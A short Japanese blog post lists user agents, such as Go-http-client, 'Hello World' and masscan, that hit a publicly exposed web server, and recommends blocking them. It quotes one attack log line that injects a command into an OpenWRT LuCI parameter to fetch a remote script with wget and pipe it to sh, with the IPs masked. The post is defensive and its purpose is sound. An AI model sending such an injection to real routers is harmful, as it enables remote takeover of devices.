🔥
危ないユーザーエージェントはブロックすべし
※クソ記事です、今すぐブラウザバックしたほうが幸せです。。。by筆者
WEBを外部公開すると、1日に何十件と不正なリクエストが降ってきます。特に悪く目立ったユーザーエージェントを公開しようかと思います。
一覧
UA
Go-http-client/1.1
python-requests/2.27.1 (2.27.1じゃないときもあり)
Custom-AsyncHttpClient
Hello World
Mozilla/5.0 Keydrop
もうこれのほとんどがインジェクション攻撃とか環境変数を探ってきたりヤバいヤツばっかです。
見つけたら即ブロックでいいと思います。特にHello WorldなんかはMiraiと呼ばれる危険なヤツらしいです。また上記に登場するプログラミング言語やライブラリを使用する場合はユーザーエージェントを自分で書き換えたほうがいいと思います。
下記に記載されたのは絶対に実行しないように...(危険です)。。。
luci...ってことはOpenWRTあたりを狙ってるんでしょうか...
ヤバいリクエストの例(絶対にアクセスするな)
##XXX.XXX.XXX.XXX,YYY.YYY.YYY.YYYは任意のIPアドレス
XXX.XXX.XXX.XXX - - [28/Nov/2024:07:17:12 +0900] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60wget+-O-+http%3A%2F%2FYYY.YYY.YYY.YYY%2Ft%7Csh%3B%60) HTTP/1.1" 400 150 "-" "Go-http-client/1.1"
続いてこちら
UA
Mozilla/5.0 zgrab/0.x
ivre-masscan/1.3 https://github.com/robertdavidgraham/
masscan/1.3 (https://github.com/robertdavidgraham/masscan)
いわゆるスキャナです。。。大量の様々なリクエストを何度もアクセスしてきて脆弱性なんかを発見するわけですが、、、その脆弱性を悪用したい輩もいるのでこういうのもブロック対象にしてます。
Discussion